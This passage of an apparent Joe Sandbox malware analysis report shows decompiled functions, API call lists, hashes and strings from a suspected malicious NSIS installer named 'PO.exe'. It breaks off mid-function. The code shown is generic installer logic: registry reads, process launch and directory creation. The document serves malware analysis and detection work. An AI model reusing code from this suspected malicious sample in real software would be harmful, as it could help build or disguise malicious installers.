Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\PO.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-293129541
Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
Instruction ID: a69a53d4b23f3d63feeda802a3e8a765614c71270742c911b33c62312df6cecc
Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
Instruction Fuzzy Hash: 32F06D76600608BBDB008B59DD09AABBBB8EF91710F10803BEE01F7190E6B09A548B64

Uniqueness

Uniqueness Score: -1.00%

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1);
				_t34 = E10001B18();
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A9(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A9(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A9(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E1000246C(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B5F(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E100028A4(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002645(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x10001759
0x10001759
0x10001759
0x10001763
0x1000176b
0x10001778
0x10001786
0x10001789
0x1000178b
0x10001790
0x10001795
0x100018a8
0x100018a8
0x1000179b
0x1000179f
0x100017a2
0x100017a7
0x100017a8
0x100017a9
0x100017af
0x100017b5
0x100017e5
0x100017ec
0x10001810
0x1000184f
0x10001812
0x10001812
0x10001813
0x10001816
0x1000181c
0x10001820
0x10001823
0x10001828
0x10001828
0x1000182f
0x10001835
0x1000183b
0x10001847
0x10001848
0x1000184b
0x100017ee
0x100017ef
0x10001804
0x10001804
0x10001859
0x1000185c
0x10001869
0x10001870
0x10001878
0x1000187b
0x1000187b
0x10001878
0x10001888
0x10001890
0x10001895
0x10001888
0x1000189d
0x00000000
0x1000189f
0x00000000
0x100018a0
0x1000189d
0x100017b9
0x100017bc
0x100017da
0x00000000
0x00000000
0x100017dd
0x100017e2
0x100017e2
0x100017e4
0x00000000
0x100017e4
0x100017be
0x100017bf
0x100017c7
0x100017c8
0x00000000
0x100017c8
0x100017c1
0x100017c2
0x100017d0
0x00000000
0x100017d0
0x100017c5
0x00000000
0x00000000
0x00000000
0x100017c5

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8

Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000001.00000002.85191842667.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.85191813710.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191874016.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191898523.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_PO.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

Uniqueness

Uniqueness Score: -1.00%

Function 00405C3A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00405C3A(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040617E(0x425f30, _a4);
				_t21 = E00405BDD(0x425f30);
				if(_t21 != 0) {
					E00406412(_t21);
					if(( *0x42a258 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f30 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f30);
							_push(0x425f30);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004064C1();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405B7E(0x425f30);
								continue;
							} else {
								goto L1;
							}
						}
						E00405B32();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405c46
0x00405c51
0x00405c55
0x00405c5c
0x00405c68
0x00405c78
0x00405c7a
0x00405c92
0x00405c93
0x00405c9a
0x00405c9b
0x00000000
0x00000000
0x00405c7e
0x00405c85
0x00405c8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c85
0x00405c9d
0x00405ca3
0x00000000
0x00405cb1
0x00405c6a
0x00405c70
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c70
0x00405c57
0x00000000

APIs

Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B

Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30, 47w.7w,?,77372EE0,0040598F,?,77373420,77372EE0,00000000), ref: 00405BEB
Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30, 47w.7w,?,77372EE0,0040598F,?,77373420,77372EE0,00000000), ref: 00405C93
GetFileAttributesW.KERNELBASE(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30, 47w.7w,?,77372EE0,0040598F,?,77373420,77372EE0), ref: 00405CA3

Strings

47w.7w, xrefs: 00405C3C
0_B, xrefs: 00405C40

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 47w.7w$0_B
API String ID: 3248276644-330658126
Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
Instruction ID: 790be11e20efdccda9c73cacd4945748764c6204d4d0b11914a12a4c94a1ccfd
Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
Instruction Fuzzy Hash: 41F0F925108F6515F62233790D05EAF2554CF82394755067FF891B12D1DB3C9D938C7D

Uniqueness

Uniqueness Score: -1.00%

Function 0040604B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040604B(void* _a4, int _a8, short* _a12, int _a16, void* _a20) {
				long _t20;
				long _t23;
				long _t24;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExW(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x800;
					_t23 = RegQueryValueExW(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x7fe] = 0;
					_t24 = RegCloseKey(_a20); // executed
					return _t24;
				}
				return _t20;
			}

0x0040605b
0x0040605d
0x0040606a
0x00406075
0x0040607d
0x00406082
0x00406096
0x0040609e
0x004060ac
0x004060ac
0x004060b2
0x004060b9
0x00000000
0x004060b9
0x004060c2

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00406075
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00406096
RegCloseKey.KERNELBASE(?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 004060B9

Strings

Call, xrefs: 0040604E

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: 0186f18981595c0b19feb364ea02d5f95392918b8fa258a18f8687652683a575
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 4501483115020AEADF21CF66ED08E9B3BA8EF84390B01402AF845D2220D735D964DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00401E66() {
				void* _t16;
				long _t20;
				void* _t25;
				void* _t32;

				_t29 = E00402BBF(_t25);
				E004052DD(0xffffffeb, _t14);
				_t16 = E0040585E(_t29); // executed
				 *(_t32 + 8) = _t16;
				if(_t16 == _t25) {
					 *((intOrPtr*)(_t32 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t32 - 0x24)) != _t25) {
						_t20 = WaitForSingleObject(_t16, 0x64);
						while(_t20 == 0x102) {
							E00406594(0xf);
							_t20 = WaitForSingleObject( *(_t32 + 8), 0x64);
						}
						GetExitCodeProcess( *(_t32 + 8), _t32 - 8);
						if( *((intOrPtr*)(_t32 - 0x28)) < _t25) {
							if( *(_t32 - 8) != _t25) {
								 *((intOrPtr*)(_t32 - 4)) = 1;
							}
						} else {
							E004060C5( *((intOrPtr*)(_t32 - 0x10)),  *(_t32 - 8));
						}
					}
					_push( *(_t32 + 8));
					CloseHandle();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t32 - 4));
				return 0;
			}

0x00401e6c
0x00401e71
0x00401e77
0x00401e7e
0x00401e81
0x0040281e
0x00401e87
0x00401e8a
0x00401e95
0x00401eac
0x00401ea0
0x00401eaa
0x00401eaa
0x00401eb7
0x00401ec0
0x00401ed2
0x00401ed4
0x00401ed4
0x00401ec2
0x00401ec8
0x00401ec8
0x00401ec0
0x00401edb
0x00401ede
0x00401ede
0x00402a4f
0x00402a5b

APIs

Part of subcall function 004052DD: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
Part of subcall function 004052DD: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00402E19), ref: 00405338
Part of subcall function 004052DD: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll), ref: 0040534A
Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398

Part of subcall function 0040585E: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
Part of subcall function 0040585E: CloseHandle.KERNEL32(?), ref: 00405894

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: b5ca98eeb2ec1e83a9b9b596b62d8d32068d967f47a6d08354abf625494d0a31
Instruction ID: 5702df78c33f9bd13decba52644e1012fe72a42f767711efff684f6f7274af03
Opcode Fuzzy Hash: b5ca98eeb2ec1e83a9b9b596b62d8d32068d967f47a6d08354abf625494d0a31
Instruction Fuzzy Hash: FF11A131900508EBCF21AF91CD4499E7AB6AF40314F21407BFA05B61F1D7798A92DB99

Uniqueness

Uniqueness Score: -1.00%

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015B9(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402BBF(0xfffffff0);
				_t17 = E00405BDD(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405B5F(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405829( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x24)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x24)) == _t28 || E00405846(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E004057AC( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x28)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040617E(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Diakonernes\\Referenceliste\\holdovers",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015b9
0x004015c1
0x004015c4
0x004015c9
0x004015cd
0x004015cf
0x004015d7
0x004015d9
0x004015dc
0x004015e2
0x004015fc
0x004015ff
0x004015e4
0x004015e4
0x004015e7
0x00000000
0x004015f2
0x004015f5
0x004015f5
0x004015e7
0x00401606
0x0040160d
0x0040161c
0x0040161c
0x0040160f
0x00401612
0x0040161a
0x00000000
0x00000000
0x0040161a
0x0040160d
0x0040161f
0x00401623
0x00401624
0x004015cf
0x0040162c
0x0040165b
0x004021dc
0x0040162e
0x00401630
0x0040163d
0x00401645
0x0040164d
0x00401653
0x00401653
0x0040164d
0x00402a4f
0x00402a5b

APIs

Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30, 47w.7w,?,77372EE0,0040598F,?,77373420,77372EE0,00000000), ref: 00405BEB
Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 004057AC: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Referenceliste\holdovers,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Referenceliste\holdovers, xrefs: 00401638

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Referenceliste\holdovers
API String ID: 1892508949-120621409
Opcode ID: 73517b5d0da78be28060eaa35170b82405513a3442ab2227d9f24ad0b2409d52
Instruction ID: 18abe7de9e9977a76830232601504265d2e6edcedfe07fce7f69d5744a4425eb
Opcode Fuzzy Hash: 73517b5d0da78be28060eaa35170b82405513a3442ab2227d9f24ad0b2409d52
Instruction Fuzzy Hash: F911E631500504EBCF207FA0CD0199E3AB2EF44364B25453BF906B61F2DA3D4A819E5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040585E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040585E(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426730->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426730,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405867
0x00405887
0x0040588f
0x00405894
0x00000000
0x0040589a
0x0040589e

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
CloseHandle.KERNEL32(?), ref: 00405894

Strings

Error launching installer, xrefs: 00405871

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
Instruction ID: 0fb7bd0647ee639374dbc29985885c8cd5f4694ddcbbc5ba66c50ad851a9a680
Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
Instruction Fuzzy Hash: 22E04FB0A002097FEB009B64ED45F7B77ACEB04208F408431BD00F2150D77498248A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406C7B Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406C7B() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
